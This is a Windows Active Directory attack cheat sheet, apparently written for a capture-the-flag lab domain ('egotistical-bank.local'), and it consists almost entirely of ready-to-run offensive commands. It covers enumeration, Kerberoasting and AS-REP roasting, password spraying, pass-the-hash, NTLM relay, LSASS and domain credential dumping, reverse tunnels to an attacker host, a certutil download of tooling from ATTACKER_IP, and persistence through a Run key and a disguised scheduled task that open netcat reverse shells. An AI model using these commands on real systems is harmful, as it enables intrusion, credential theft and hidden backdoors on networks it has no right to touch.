Recon & Enumeration

• export TARGET=x.x.x.x
• export DOMAIN=egotistical-bank.local
• nmap -p- -Pn $TARGET -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmapAD.txt
• rpcclient -U "" $TARGET
• smbclient -L //$TARGET/ -N
• enum4linux-ng -A $TARGET
• smbmap -H $TARGET
• crackmapexec smb $TARGET --shares --users
• nbtscan $TARGET
• ldapsearch -x -H ldap://$TARGET -s base
• ldapsearch -x -H ldap://$TARGET -b "dc=egotistical-bank,dc=local" "(objectClass=*)"
• crackmapexec ldap $TARGET -u '' -p '' --users
• bloodhound-python -u user -p password -gc $DOMAIN -dc-ip $TARGET -c All
• enum4linux $TARGET (legacy alternative)
• dnsrecon -t std -d $DOMAIN -n $TARGET
• dig axfr $DOMAIN @$TARGET

Kerberos Attacks

• kerbrute userenum --dc $TARGET -d $DOMAIN users.txt
• GetNPUsers.py $DOMAIN/ -usersfile users.txt -format hashcat -dc-ip $TARGET
• GetUserSPNs.py $DOMAIN/$USER:$PASS -dc-ip $TARGET -request
• hashcat -m 18200 hashes.aspreroast rockyou.txt
• hashcat -m 13100 spn.hashes rockyou.txt
• impacket-GetTGT -hashes :NTLM_HASH $USER@$DOMAIN

Password Attacks

• crackmapexec smb $TARGET -u user -p password
• kerbrute passwordspray --dc $TARGET -d $DOMAIN users.txt passwords.txt
• hydra -L users.txt -P passwords.txt smb://$TARGET

Pass-the-Hash & Pass-the-Ticket

• psexec.py $DOMAIN/$USER@$TARGET -hashes :NTLM_HASH
• wmiexec.py $DOMAIN/$USER@$TARGET -hashes :NTLM_HASH
• smbexec.py $DOMAIN/$USER@$TARGET -hashes :NTLM_HASH
• atexec.py $DOMAIN/$USER@$TARGET -hashes :NTLM_HASH
• export KRB5CCNAME=~/ticket.ccache && klist
• impacket-smbclient -k -no-pass $DOMAIN/$USER@$TARGET

WinRM & Remote Shell

• crackmapexec winrm $TARGET -u user -p password
• evil-winrm -i $TARGET -u user -p password
• nxc winrm -u user -p password -H $TARGET

GPP & SYSVOL Exploitation

• smbclient //TARGET/SYSVOL -U "$DOMAIN\$USER"
• look for Groups.xml in Policies directories
• gpp-decrypt

Post Exploitation / Priv Esc

• certutil -urlcache -split -f http://ATTACKER_IP/winPEASany.exe winPEAS.exe
• winPEAS.exe > winpeas_output.txt
• systeminfo
• whoami /all
• procdump64.exe -accepteula -ma lsass.exe lsass.dmp
• mimikatz: sekurlsa::minidump lsass.dmp
• SharpHound.exe -c all

Responder & NTLM Relay

• sudo responder -I tun0
• ntlmrelayx.py -t ldap://$TARGET --no-smb-server
• mitm6 -d $DOMAIN

Pivoting & Tunneling

• ssh -R 9000:127.0.0.1:3389 user@attacker-ip
• chisel server -p 9001 --reverse
• chisel client attacker-ip:9001 R:3389:127.0.0.1:3389
• plink.exe -R 9000:127.0.0.1:3389 user@attacker-ip

Credential Dumping

• secretsdump.py $DOMAIN/$USER@$TARGET
• mimikatz: sekurlsa::logonpasswords
• findstr /si password *.txt *.xml *.ini
• reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s

Persistence Techniques (CTF Safe)

• reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Evil /t REG_SZ /d "cmd.exe /c nc.exe -e cmd.exe ATTACKER_IP 4444"
• schtasks /create /sc minute /mo 5 /tn "Updater" /tr "nc.exe -e cmd.exe ATTACKER_IP 4444"